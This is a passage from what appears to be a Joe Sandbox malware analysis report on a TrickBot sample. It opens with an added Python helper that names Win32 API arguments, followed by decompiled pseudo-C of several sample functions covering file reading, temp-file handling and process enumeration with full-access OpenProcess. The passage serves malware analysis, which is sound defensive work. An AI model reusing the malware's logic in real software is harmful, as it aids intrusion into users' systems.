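The API listings above (the RtlEnterCriticalSection / DeleteFileW / GetFullPathNameW / RemoveDirectoryW block for the first function, and the CreateFileW / SetFilePointer / ReadFile block for E006F7410) read much faster once the raw hex arguments are named. The Python helper below is an added example for this page, not code from Joe Sandbox or from the sample. It parses lines in the report's "APIs" format, names the CreateFileW access, share, disposition and attribute values and the SetFilePointer move method from the documented Win32 constants, and mirrors the size ceiling visible in the decompiled E006F7410 (`_t23 = _t41 - 1; if (_t23 > 0x4ffffe) goto L19`, so a file larger than 0x4FFFFF bytes is closed without being read). The function and type names are the helper's own; the sample input is the E006F7410 listing copied from the report.

```python
"""Decode the Win32 API call lines Joe Sandbox prints under "APIs" for each
decompiled function.  Added triage helper for this page; not part of the
sandbox report or of the analysed TrickBot sample.  Constant names follow
the public Win32 headers; the size cap is taken from decompiled E006F7410."""
from __future__ import annotations

import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed input: the "APIs" listing for E006F7410, copied from the report.
REPORT_API_LINES = """\
• CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 006F74C8
• SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 006F74DA
• SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 006F74ED
• ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 006F7516
• CloseHandle.KERNEL32(00000000), ref: 006F7521
  • Part of subcall function 006E91E0: RtlFreeHeap.NTDLL(00000008,?,006E9F64), ref: 006E91F1
• CloseHandle.KERNEL32(00000000), ref: 006F754A
"""

# Largest file E006F7410 reads into memory.  The decompiled check compares
# (size - 1) against 0x4ffffe, i.e. anything above 0x4FFFFF bytes is skipped.
MAX_READ_SIZE = 0x4FFFFF

LINE_RE = re.compile(
    r"•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)

# Documented Win32 constants used to name the arguments.
ACCESS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE", 0x10000000: "GENERIC_ALL"}
SHARE = {0x1: "FILE_SHARE_READ", 0x2: "FILE_SHARE_WRITE", 0x4: "FILE_SHARE_DELETE"}
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
               4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
ATTRS = {0x80: "FILE_ATTRIBUTE_NORMAL", 0x2: "FILE_ATTRIBUTE_HIDDEN",
         0x4000000: "FILE_FLAG_DELETE_ON_CLOSE"}
MOVE_METHOD = {0: "FILE_BEGIN", 1: "FILE_CURRENT", 2: "FILE_END"}


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[Optional[int]]          # None where the report prints '?' (unknown value)
    ref: int                           # address of the call instruction
    subcall_of: Optional[int] = None   # set for "Part of subcall function ..." lines
    notes: List[str] = field(default_factory=list)


def _flags(value: int, table: dict) -> str:
    names = [name for bit, name in table.items() if value & bit]
    return "|".join(names) if names else hex(value)


def annotate(call: ApiCall) -> None:
    """Attach the meaning of the argument values the report shows."""
    a = call.args
    if call.api == "CreateFileW" and len(a) == 7 and None not in a[1:]:
        call.notes.append(
            f"access={_flags(a[1], ACCESS)} share={_flags(a[2], SHARE)} "
            f"disposition={DISPOSITION.get(a[4], hex(a[4]))} attrs={_flags(a[5], ATTRS)}"
        )
    elif call.api == "SetFilePointer" and len(a) == 4 and None not in a[1:]:
        call.notes.append(f"move={MOVE_METHOD.get(a[3], hex(a[3]))}")
        if (a[1], a[2], a[3]) == (0, 0, 2):
            call.notes.append("zero-offset seek to FILE_END: file-size probe")


def parse_api_lines(text: str) -> List[ApiCall]:
    """Parse every '• Api.MODULE(args), ref: addr' line into an ApiCall."""
    calls: List[ApiCall] = []
    for raw in text.splitlines():
        m = LINE_RE.search(raw)
        if not m:
            continue
        args = [None if tok.strip() == "?" else int(tok, 16)
                for tok in m["args"].split(",") if tok.strip()]
        call = ApiCall(m["api"], m["mod"], args, int(m["ref"], 16),
                       int(m["sub"], 16) if m["sub"] else None)
        annotate(call)
        calls.append(call)
    return calls


def size_within_cap(size: int) -> bool:
    """Upper bound applied by E006F7410 before it allocates and reads."""
    return size <= MAX_READ_SIZE


if __name__ == "__main__":
    for c in parse_api_lines(REPORT_API_LINES):
        where = f" (in {c.subcall_of:08X})" if c.subcall_of else ""
        print(f"{c.ref:08X} {c.api}.{c.module}{where} {' ; '.join(c.notes)}")
```

Run over the E006F7410 listing it prints the sequence a reader would otherwise reconstruct by hand: open read-only with FILE_SHARE_READ and OPEN_EXISTING, zero-offset seek to FILE_END to learn the size, seek back to FILE_BEGIN, then ReadFile into a heap buffer of that size, with files above 0x4FFFFF bytes (just under 5 MiB) rejected. The same parser works on the other "APIs" blocks in this report; only `annotate` needs extending with tables for further functions.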

                          C-Code - Quality: 96%
                          			E006EFA90(short* __ecx, void* __eflags, WCHAR* _a8, WCHAR* _a12, WCHAR* _a16) {
                          				WCHAR* _v0;
                          				WCHAR* _v8;
                          				char _v220;
                          				int _v224;
                          				short _v228;
                          				WCHAR* _v236;
                          				char _v240;
                          				signed int _v244;
                          				WCHAR* _v248;
                          				intOrPtr _v252;
                          				WCHAR* _v256;
                          				short _v260;
                          				char _v264;
                          				short* _v268;
                          				short* _v272;
                          				short* _v276;
                          				short* _v280;
                          				WCHAR* _v284;
                          				intOrPtr _v288;
                          				intOrPtr _v292;
                          				intOrPtr _t107;
                          				WCHAR* _t108;
                          				WCHAR* _t116;
                          				WCHAR* _t123;
                          				WCHAR* _t124;
                          				intOrPtr _t125;
                          				WCHAR* _t127;
                          				intOrPtr _t128;
                          				WCHAR* _t131;
                          				intOrPtr _t132;
                          				WCHAR* _t134;
                          				intOrPtr _t135;
                          				WCHAR* _t136;
                          				intOrPtr _t137;
                          				WCHAR* _t140;
                          				WCHAR* _t141;
                          				intOrPtr _t142;
                          				WCHAR* _t147;
                          				WCHAR* _t149;
                          				signed int _t152;
                          				intOrPtr _t154;
                          				signed int _t155;
                          				signed int _t159;
                          				WCHAR* _t163;
                          				WCHAR* _t164;
                          				WCHAR* _t165;
                          				WCHAR* _t167;
                          				intOrPtr _t168;
                          				intOrPtr _t169;
                          				signed int _t170;
                          				short* _t172;
                          				char* _t173;
                          				WCHAR* _t174;
                          				signed int _t178;
                          				intOrPtr _t181;
                          				signed int _t182;
                          				short* _t184;
                          				WCHAR* _t186;
                          				WCHAR* _t187;
                          				short* _t189;
                          				intOrPtr _t190;
                          				WCHAR* _t194;
                          				WCHAR* _t195;
                          				signed int _t196;
                          				short** _t200;
                          
                          				_t195 = _a8;
                          				_t189 = __ecx;
                          				E006F6610( &_v284, 0, 0x10c);
                          				_t200 =  &(( &_v280)[3]);
                          				_t107 =  *0x6f9b0c; // 0x2ef350
                          				 *(_t107 + 8) = 6;
                          				_t4 = _t107 + 0x24; // 0x0
                          				_t168 =  *_t4;
                          				if(_t168 == 0) {
                          					L32:
                          					 *(_t107 + 8) = 2;
                          					goto L33;
                          				} else {
                          					_t152 = 0xfffffffe;
                          					_t149 = 1;
                          					while( *((short*)(_t168 + _t149 * 2 - 2)) != 0) {
                          						_t149 =  &(_t149[0]);
                          						_t152 = _t152 + 0xfffffffe;
                          						if(_t149 != 0x80000000) {
                          							continue;
                          						} else {
                          							_v252 = 0;
                          							_v248 = 0x80070057;
                          							goto L32;
                          						}
                          					}
                          					_t10 = _t149 - 1; // 0x0
                          					_t181 = _t10;
                          					_v252 = _t181;
                          					_v248 = 0;
                          					_t123 = E006E3180( ~_t152, 0);
                          					_t200 =  &(_t200[2]);
                          					_t169 =  *0x6f9b0c; // 0x2ef350
                          					__eflags = _t123;
                          					_v284 = _t123;
                          					if(_t123 == 0) {
                          						 *(_t169 + 8) = 6;
                          						L33:
                          						if(_v220 == 0) {
                          							_t108 = _v256;
                          							__eflags = _t108;
                          							if(_t108 != 0) {
                          								E006E91E0(_t108);
                          								_t200 =  &(_t200[1]);
                          							}
                          							__eflags = _t195;
                          							if(_t195 != 0) {
                          								_t116 = _v0;
                          								__eflags = _t116;
                          								if(_t116 != 0) {
                          									DeleteFileW(_t116);
                          									E006E91E0(_v0);
                          									_t200 =  &(_t200[1]);
                          									_v0 = 0;
                          								}
                          							}
                          						} else {
                          							if(_t195 != 0) {
                          								_t120 = _v256;
                          								if(_v256 != 0) {
                          									E006E91E0(_t120);
                          									_t200 =  &(_t200[1]);
                          								}
                          							}
                          						}
                          						_t109 = _v260;
                          						if(_v260 != 0) {
                          							E006E91E0(_t109);
                          							_t200 =  &(_t200[1]);
                          						}
                          						_t110 = _v284;
                          						if(_v284 != 0) {
                          							E006E91E0(_t110);
                          							_t200 =  &(_t200[1]);
                          						}
                          						_t111 = _v276;
                          						if(_v276 != 0) {
                          							E006E91E0(_t111);
                          						}
                          						return _v220;
                          					}
                          					__eflags = _t149;
                          					if(__eflags <= 0) {
                          						_t154 = 0x80070057;
                          						if(__eflags != 0) {
                          							 *_t123 = 0;
                          						}
                          						L16:
                          						_v248 = _t154;
                          						 *(_t169 + 8) = 2;
                          						goto L33;
                          					} else {
                          						 *_t200 = _t189;
                          						_t14 = _t169 + 0x24; // 0x0
                          						_t190 =  *_t14;
                          						_v288 = _t181;
                          						_v292 = _t169;
                          						_t182 = 2;
                          						_t170 = 0;
                          						_t155 = 0;
                          						__eflags = 0;
                          						while(1) {
                          							_t196 =  *(_t190 + _t155 * 2) & 0x0000ffff;
                          							__eflags = _t196;
                          							if(_t196 == 0) {
                          								break;
                          							}
                          							_t123[_t155] = _t196;
                          							_t182 = _t182 + 0xfffffffe;
                          							_t170 = _t170 + 0xfffffffe;
                          							__eflags = _t149 - 1;
                          							_t149 = _t149 - 1;
                          							if(__eflags == 0) {
                          								L11:
                          								__eflags = _t149;
                          								_t180 =  ==  ?  ~_t182 :  ~_t170;
                          								 *((short*)(_t123 + ( ==  ?  ~_t182 :  ~_t170))) = 0;
                          								if(_t149 != 0) {
                          									L18:
                          									 *((intOrPtr*)( &_v240 - 8)) = 0;
                          									_t184 =  &(( *_t200)[6]);
                          									_t124 = E006F08A0(_t123, _t123, _v288,  &_v276,  &_v240);
                          									_t195 = _v8;
                          									__eflags = _t124;
                          									if(_t124 == 0) {
                          										L31:
                          										_t107 =  *0x6f9b0c; // 0x2ef350
                          										goto L32;
                          									}
                          									_t125 = _v240;
                          									__eflags = _t125 - 0x23;
                          									if(_t125 <= 0x23) {
                          										goto L31;
                          									}
                          									_t172 = _v276;
                          									 *_t200 = _t184;
                          									_v228 =  *_t172;
                          									_v268 =  &(_t172[2]);
                          									_t159 = _t172[0x12];
                          									_v244 = _t159;
                          									_v280 =  &(_t172[0x14]);
                          									_t193 = _t172 + 0x28 + _t159 * 2;
                          									_t186 = _t125 - 0x28 - _t159 + _t159;
                          									__eflags = _t159;
                          									_v264 = _t172 + 0x28 + _t159 * 2;
                          									_v236 = _t186;
                          									_v272 = _t172;
                          									if(_t159 == 0) {
                          										goto L31;
                          									}
                          									__eflags = _t186;
                          									if(_t186 == 0) {
                          										goto L31;
                          									}
                          									_push(_t186);
                          									_t127 = E006EB250(_t172, _t125 - _t186, _t193);
                          									__eflags = _t127;
                          									if(_t127 == 0) {
                          										_t128 =  *0x6f9b0c; // 0x2ef350
                          										 *((intOrPtr*)(_t128 + 8)) = 3;
                          										goto L33;
                          									}
                          									_t187 = _a12;
                          									__eflags = _t195;
                          									 *_v268 = 0;
                          									if(__eflags == 0) {
                          										L66:
                          										_push(0xc);
                          										_push( &_v228);
                          										_t131 = E006EDCF0(__eflags,  *((intOrPtr*)( &_v260 - 0x18)),  &_v260);
                          										_t200 =  &(_t200[4]);
                          										__eflags = _t131;
                          										if(_t131 == 0) {
                          											_t132 =  *0x6f9b0c; // 0x2ef350
                          											 *((intOrPtr*)(_t132 + 8)) = 4;
                          											goto L33;
                          										}
                          										_t173 =  &_v264;
                          										_push(0x800c);
                          										_push( &_v236);
                          										_push(_t173);
                          										_push( *((intOrPtr*)(_t173 + 0x24)));
                          										_push( *((intOrPtr*)(_t173 + 4)));
                          										_t134 = E006EF800();
                          										__eflags = _t134;
                          										if(_t134 == 0) {
                          											L70:
                          											_t135 =  *0x6f9b0c; // 0x2ef350
                          											 *((intOrPtr*)(_t135 + 8)) = 5;
                          											goto L33;
                          										}
                          										__eflags = _v236 - 0x20;
                          										if(_v236 != 0x20) {
                          											goto L70;
                          										}
                          										_t136 = E006F7D20(_v264, _v272, 0x20);
                          										_t200 =  &(_t200[3]);
                          										__eflags = _t136;
                          										if(_t136 == 0) {
                          											__eflags = _t195;
                          											if(_t195 == 0) {
                          												_t163 = _a8;
                          												__eflags = _t163;
                          												if(_t163 == 0) {
                          													L79:
                          													__eflags = _v224;
                          													if(_v224 != 0) {
                          														_t137 =  *0x6f9b0c; // 0x2ef350
                          														 *(_t137 + 8) = 1;
                          													}
                          													goto L33;
                          												}
                          												__eflags = _t187;
                          												 *_t163 = _v260;
                          												if(_t187 == 0) {
                          													goto L79;
                          												}
                          												 *_t187 = _v228;
                          												L78:
                          												_v224 = 1;
                          												goto L79;
                          											}
                          											_t140 = E006E6270(_t136, _v0, _v260, _v228);
                          											_t200 =  &(_t200[3]);
                          											__eflags = _t140;
                          											if(_t140 != 0) {
                          												goto L78;
                          											}
                          											goto L33;
                          										}
                          										goto L70;
                          									}
                          									_t141 = E006E3180(0x20a, 0);
                          									_t200 =  &(_t200[2]);
                          									__eflags = _t141;
                          									_v0 = _t141;
                          									if(_t141 == 0) {
                          										_t142 =  *0x6f9b0c; // 0x2ef350
                          										 *(_t142 + 8) = 6;
                          										goto L33;
                          									}
                          									__eflags = _v0;
                          									if(_v0 == 0) {
                          										L30:
                          										GetTempPathW(0x104, _t141);
                          										_t194 =  &_v220;
                          										E006F4520(_t194, 0x7c);
                          										_t200 =  &(_t200[2]);
                          										GetTempFileNameW(_v0, _t194, 1, _v0);
                          										_t141 = _v0;
                          										L52:
                          										_t174 = 0;
                          										__eflags = 0;
                          										_t164 = _t141;
                          										while(1) {
                          											__eflags =  *_t164;
                          											if( *_t164 == 0) {
                          												break;
                          											}
                          											_t174 = _t174 + 1;
                          											_t164 =  &(_t164[1]);
                          											__eflags = _t174 - 0x103;
                          											if(_t174 <= 0x103) {
                          												continue;
                          											}
                          											break;
                          										}
                          										__eflags = _t164 - _t141;
                          										if(__eflags <= 0) {
                          											goto L66;
                          										}
                          										_t165 =  &(_t164[2]);
                          										__eflags = _t165;
                          										while(1) {
                          											__eflags = ( *(_t165 - 4) & 0x0000ffff) - 0x2e;
                          											if(( *(_t165 - 4) & 0x0000ffff) == 0x2e) {
                          												break;
                          											}
                          											_t79 = _t165 - 2; // -8
                          											__eflags =  &(_t165[0xfffffffffffffffd]) - _t141;
                          											_t165 = _t79;
                          											if(__eflags > 0) {
                          												continue;
                          											}
                          											goto L66;
                          										}
                          										_t147 = _a16;
                          										__eflags = _t147;
                          										if(__eflags == 0) {
                          											 *(_t165 - 2) = 0x780065;
                          											_t165[1] = 0x65;
                          											_t165 =  &(_t165[1]);
                          										} else {
                          											__eflags = _t147 - 1;
                          											if(__eflags != 0) {
                          												_t165 =  &(_t165[0xffffffffffffffff]);
                          												__eflags = _t165;
                          											} else {
                          												 *(_t165 - 2) = 0x73006a;
                          											}
                          										}
                          										_t165[1] = 0;
                          										goto L66;
                          									}
                          									_t167 = 0xfffffdf8;
                          									while(1) {
                          										_t178 =  *(_v0 +  &(_t167[0x104])) & 0x0000ffff;
                          										__eflags = _t178;
                          										if(_t178 == 0) {
                          											break;
                          										}
                          										 *(_t141 +  &(_t167[0x104])) = _t178;
                          										_t167 =  &(_t167[1]);
                          										__eflags = _t167;
                          										if(_t167 != 0) {
                          											continue;
                          										}
                          										 *((short*)(_t141 +  &(_t167[0x103]))) = 0;
                          										_v252 = 0x8007007a;
                          										goto L30;
                          									}
                          									 *(_t141 +  &(_t167[0x104])) = 0;
                          									_v252 = 0;
                          									goto L52;
                          								} else {
                          									_t195 = _a8;
                          									_t169 = _v292;
                          									_t154 = 0x8007007a;
                          									goto L16;
                          								}
                          							}
                          							__eflags = _t155 - 0x7ffffffd;
                          							_t155 = _t155 + 1;
                          							if(__eflags != 0) {
                          								continue;
                          							}
                          							goto L11;
                          						}
                          						_t123[_t155] = 0;
                          						goto L18;
                          					}
                          				}
                          			}

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.541878315.006E1000.00000020.00000001.sdmp, Offset: 006E0000, based on PE: true
                          • Associated: 00000003.00000002.541873241.006E0000.00000002.00000001.sdmp
                          • Associated: 00000003.00000002.541894547.006F8000.00000004.00000001.sdmp
                          • Associated: 00000003.00000002.541901024.006FA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e0000_______.jbxd
                          Similarity
                          • API ID: DeleteFile
                          • String ID: $z
                          • API String ID: 4033686569-2251613814
                          • Opcode ID: e62ce916766a1595f7791dd499e69e6b50ac4395be25867f1a76e99a1fcd9275
                          • Instruction ID: 43ab49c6f9fa8dc1eeeb81a1cb8f20ff3dca93372125b9252020c25e9e3fd99b
                          • Opcode Fuzzy Hash: e62ce916766a1595f7791dd499e69e6b50ac4395be25867f1a76e99a1fcd9275
                          • Instruction Fuzzy Hash: 31C1AFB16053819BDB20CF16DC48BABBBE6EF84304F14862DF9498B3A1E771D945CB52
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E006EC510(void* __eax, void* __ecx) {
                          				void* _t7;
                          				long _t9;
                          				void* _t13;
                          				void* _t20; // heap buffer returned by E006E3180 (declaration missing in decompiler output)
                          				void* _t22;
                          				long _t23;
                          				long _t25;
                          				DWORD* _t26;
                          
                          				_t23 = 0;
                          				 *_t26 = 0;
                          				_t7 = CreateFileW(_t26[6], 0x80000000, 1, 0, 3, 0x80, 0);
                          				if(_t7 != 0xffffffff) {
                          					_t22 = _t7;
                          					_t23 = 0;
                          					_t9 = SetFilePointer(_t7, 0, 0, 2);
                          					if(_t9 == 0xffffffff) {
                          						L7:
                          						CloseHandle(_t22);
                          					} else {
                          						_t25 = _t9;
                          						SetFilePointer(_t22, 0, 0, 0);
                          						_t2 = _t25 - 1; // -1
                          						if(_t2 > 0xffffe) {
                          							goto L7;
                          						} else {
                          							_t13 = E006E3180(_t25, 0);
                          							_t26 =  &(_t26[2]);
                          							if(_t13 == 0) {
                          								goto L7;
                          							} else {
                          								_t20 = _t13;
                          								if(ReadFile(_t22, _t13, _t25, _t26, 0) == 0) {
                          									E006E91E0(_t20);
                          									_t26 =  &(_t26[1]);
                          									goto L7;
                          								} else {
                          									CloseHandle(_t22);
                          									_t23 = E006EB9F0(_t20, _t26[1], _t26[7]);
                          									E006E91E0(_t20);
                          									_t26 =  &(_t26[4]);
                          								}
                          							}
                          						}
                          					}
                          				}
                          				return _t23;
                          			}

                          APIs
                          • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 006EC52F
                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 006EC547
                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 006EC558
                            • Part of subcall function 006E3180: GetProcessHeap.KERNEL32(00000000,00000000,006F2549,?,00000000,00000001,00000000), ref: 006E3193
                            • Part of subcall function 006E3180: RtlReAllocateHeap.NTDLL(002B0000,00000008,?,?), ref: 006E31B0
                          • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 006EC581
                          • CloseHandle.KERNEL32(00000000), ref: 006EC590
                            • Part of subcall function 006EB9F0: CreateFileW.KERNEL32(C0000000,00000001,00000000,00000002,00000080,00000000), ref: 006EBA3B
                            • Part of subcall function 006E91E0: RtlFreeHeap.NTDLL(00000008,?,006E9F64), ref: 006E91F1
                          • CloseHandle.KERNEL32(00000000), ref: 006EC5BB
                          Memory Dump Source
                          • Source File: 00000003.00000002.541878315.006E1000.00000020.00000001.sdmp, Offset: 006E0000, based on PE: true
                          • Associated: 00000003.00000002.541873241.006E0000.00000002.00000001.sdmp
                          • Associated: 00000003.00000002.541894547.006F8000.00000004.00000001.sdmp
                          • Associated: 00000003.00000002.541901024.006FA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e0000_______.jbxd
                          Similarity
                          • API ID: File$Heap$CloseCreateHandlePointer$AllocateFreeProcessRead
                          • String ID:
                          • API String ID: 739418787-0
                          • Opcode ID: fe33329b89a31f67c0869d0e8bccd423e9674ef3f06c85033eb5c5b2f56cbd26
                          • Instruction ID: 0fc3eb8fbcc7ffb5043b4bf337f254ec7fb91797f33d5a69f396c33b5cff7f96
                          • Opcode Fuzzy Hash: fe33329b89a31f67c0869d0e8bccd423e9674ef3f06c85033eb5c5b2f56cbd26
                          • Instruction Fuzzy Hash: E11191B25022547BD63016366C8DFBB3E9EDF427B5F140528F90AD6291E621ED16C2F1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 37%
                          			E006F0230(WCHAR* _a4, intOrPtr* _a8, intOrPtr* _a12, intOrPtr* _a16) {
                          				struct _FILETIME _v20;
                          				struct _FILETIME _v28;
                          				intOrPtr _v32;
                          				intOrPtr _v36;
                          				void* _t13;
                          				intOrPtr* _t24;
                          				intOrPtr* _t25;
                          				struct _SECURITY_ATTRIBUTES* _t28;
                          				intOrPtr* _t29;
                          				void* _t31;
                          
                          				_t28 = 0;
                          				_t13 = CreateFileW(_a4, 0x80000000, 1, 0, 3, 0, 0);
                          				if(_t13 != 0xffffffff) {
                          					_t31 = _t13;
                          					if(GetFileTime(_t31,  &_v20,  &_v28,  &(_v28.dwHighDateTime)) == 0) {
                          						_t28 = 0;
                          					} else {
                          						_t24 = _a8;
                          						_t29 = _a12;
                          						if(_t24 != 0) {
                          							 *_t24 =  *0x6f9ee4(_v20.dwLowDateTime, _v20.dwHighDateTime, 0x989680, 0) + 0x49ef6f00;
                          						}
                          						_t25 = _a16;
                          						if(_t29 != 0) {
                          							 *_t29 =  *0x6f9ee4(_v28.dwLowDateTime, _v28.dwHighDateTime, 0x989680, 0) + 0x49ef6f00;
                          						}
                          						_t28 = 1;
                          						if(_t25 != 0) {
                          							 *_t25 =  *0x6f9ee4(_v36, _v32, 0x989680, 0) + 0x49ef6f00;
                          						}
                          					}
                          					CloseHandle(_t31);
                          				}
                          				return _t28;
                          			}

                          APIs
                          • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006F0248
                          • GetFileTime.KERNEL32(00000000,?,?,?,?,?,006F0385,00000000), ref: 006F0267
                          • _aulldiv.NTDLL(?,?,00989680,00000000), ref: 006F028C
                          • _aulldiv.NTDLL(?,?,00989680,00000000), ref: 006F02B0
                          • _aulldiv.NTDLL(?,?,00989680,00000000), ref: 006F02D3
                          • CloseHandle.KERNEL32(00000000), ref: 006F02E5
                          Memory Dump Source
                          • Source File: 00000003.00000002.541878315.006E1000.00000020.00000001.sdmp, Offset: 006E0000, based on PE: true
                          • Associated: 00000003.00000002.541873241.006E0000.00000002.00000001.sdmp
                          • Associated: 00000003.00000002.541894547.006F8000.00000004.00000001.sdmp
                          • Associated: 00000003.00000002.541901024.006FA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e0000_______.jbxd
                          Similarity
                          • API ID: _aulldiv$File$CloseCreateHandleTime
                          • String ID:
                          • API String ID: 504125806-0
                          • Opcode ID: b5ab084d53893bf1dcf81fe59742a972a511e0f1d11c3ab828fb4180ad3088e7
                          • Instruction ID: a920377ba5fb31b432dd6c6c4580bdf0da75cf8285a5d76b1aebc387760fbcd5
                          • Opcode Fuzzy Hash: b5ab084d53893bf1dcf81fe59742a972a511e0f1d11c3ab828fb4180ad3088e7
                          • Instruction Fuzzy Hash: 2911B132204342BFE7209F24DC49F6B7BAAEFC4B08F144518F65596294D7708D15CB65
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E006E9A60(intOrPtr __ecx) {
                          				void** _v0;
                          				WCHAR* _v4;
                          				char _v544;
                          				long _v572;
                          				char _v576;
                          				void* _v580;
                          				void* _t9;
                          				struct tagPROCESSENTRY32W* _t11;
                          				void* _t14;
                          				int _t17;
                          				WCHAR* _t18;
                          				intOrPtr _t23;
                          				WCHAR* _t24;
                          				void* _t25;
                          				intOrPtr* _t27;
                          
                          				_t23 = __ecx;
                          				_v572 = 0x22c;
                          				_t9 = CreateToolhelp32Snapshot(2, 0);
                          				if(_t9 == 0xffffffff) {
                          					_t17 = 0;
                          					L10:
                          					return _t17;
                          				}
                          				_t25 = _t9;
                          				_t11 =  &_v576;
                          				Process32FirstW(_t25, _t11);
                          				_t17 = 0;
                          				if(_t11 != 1) {
                          					L9:
                          					CloseHandle(_t25);
                          					goto L10;
                          				}
                          				 *_t27 = _t23;
                          				_t24 = _v4;
                          				_t18 =  &_v544;
                          				while(lstrcmpiW(_t18, _t24) != 0) {
                          					if(Process32NextW(_t25,  &_v580) == 1) {
                          						continue;
                          					}
                          					_t17 = 0;
                          					goto L9;
                          				}
                          				_t14 = OpenProcess(0x1fffff, 0, _v572);
                          				_t17 = 0;
                          				if(_t14 != 0) {
                          					_t17 = 1;
                          					 *( *_t27 + 0x78) = 0;
                          					 *_v0 = _t14;
                          				}
                          				goto L9;
                          			}

                          APIs
                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 006E9A78
                          • Process32FirstW.KERNEL32(00000000,0000022C), ref: 006E9A8B
                          • lstrcmpiW.KERNEL32(?,?), ref: 006E9AAE
                          • Process32NextW.KERNEL32(00000000,0000022C), ref: 006E9ABA
                          • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 006E9AD8
                          • CloseHandle.KERNEL32(00000000), ref: 006E9AFE
                          Memory Dump Source
                          • Source File: 00000003.00000002.541878315.006E1000.00000020.00000001.sdmp, Offset: 006E0000, based on PE: true
                          • Associated: 00000003.00000002.541873241.006E0000.00000002.00000001.sdmp
                          • Associated: 00000003.00000002.541894547.006F8000.00000004.00000001.sdmp
                          • Associated: 00000003.00000002.541901024.006FA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e0000_______.jbxd
                          Similarity
                          • API ID: Process32$CloseCreateFirstHandleNextOpenProcessSnapshotToolhelp32lstrcmpi
                          • String ID:
                          • API String ID: 3301242143-0
                          • Opcode ID: 5aef31cb55af3367d73229be30f417820d1d4c17dc1d040eb369162c3c58fec7
                          • Instruction ID: b4546ad2559a220437a4ae6b1ac3760b6a85a0f35ae772a989068224f4348b72
                          • Opcode Fuzzy Hash: 5aef31cb55af3367d73229be30f417820d1d4c17dc1d040eb369162c3c58fec7
                          • Instruction Fuzzy Hash: 73117031205340AFD3215FA9ECC8BBBBBEAEF85318F244539F6598A290D7749806C771
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 46%
                          			E006E7A60() {
                          				intOrPtr _v4;
                          				char _v416;
                          				char _v624;
                          				char _v824;
                          				intOrPtr _v828;
                          				intOrPtr _v832;
                          				intOrPtr _v836;
                          				intOrPtr _v840;
                          				intOrPtr _v844;
                          				intOrPtr _v848;
                          				intOrPtr _v852;
                          				char _v856;
                          				char _v860;
                          				char _v864;
                          				char _v868;
                          				intOrPtr _v884;
                          				intOrPtr _t36;
                          				intOrPtr _t39;
                          				intOrPtr _t40;
                          				intOrPtr _t41;
                          				void* _t47;
                          				intOrPtr _t48;
                          				intOrPtr _t52;
                          				signed int _t54;
                          				char _t58;
                          				unsigned int _t62;
                          				intOrPtr _t67;
                          				void* _t68;
                          				intOrPtr _t69;
                          				char* _t71;
                          
                          				_t72 =  &_v848;
                          				_t58 = 0;
                          				_v860 = 0;
                          				_v864 = 0;
                          				_push( &_v416);
                          				_push(0x202);
                          				if( *0x6f9eac() != 0) {
                          					L31:
                          					_t32 = _v868;
                          					if(_v868 != 0) {
                          						E006E91E0(_t32);
                          					}
                          					 *0x6f9eb4();
                          					return _t58;
                          				}
                          				_t36 = E006E3180(0x100, 0);
                          				_t72 =  &_v848 + 8;
                          				_t69 = _t36;
                          				if(_t36 == 0) {
                          					L26:
                          					_t58 = 0;
                          					_t67 = 0;
                          					L27:
                          					if(_t69 != 0) {
                          						E006E91E0(_t69);
                          						_t72 = _t72 + 4;
                          					}
                          					if(_t67 != 0) {
                          						E006E91E0(_t67);
                          						_t72 = _t72 + 4;
                          					}
                          					goto L31;
                          				}
                          				_t39 = E006EA3C0(_v4);
                          				if(_t39 == 0) {
                          					goto L26;
                          				}
                          				_v864 = _t39;
                          				_t40 = 0;
                          				_t68 = 0;
                          				_v860 = _t69;
                          				L4:
                          				L4:
                          				if(_t40 != 0) {
                          					E006E91E0(_t40);
                          					_t72 = _t72 + 4;
                          				}
                          				_t41 =  *_t72;
                          				_v868 = 0;
                          				if(_t41 != 0) {
                          					 *0x6f9ea4(_t41);
                          				}
                          				_t58 = 0;
                          				 *_t72 = 0;
                          				E006F4520( &_v624, 0x40);
                          				_t8 = _t68 + 0x12; // 0x13
                          				_t71 =  &_v824;
                          				E006ED470(_t71, _t8);
                          				_push(_t71);
                          				_t69 = _v860;
                          				E006F68E0(_t69, 0x80,  &_v624, _v864);
                          				_t47 = E006F2E70(_t69, 0,  &_v868, 0xffffffff);
                          				_t72 = _t72 + 0x34;
                          				if(_t47 == 0) {
                          					goto L23;
                          				}
                          				_v828 = 0;
                          				_v832 = 0;
                          				_v836 = 0;
                          				_v840 = 0;
                          				_v844 = 0;
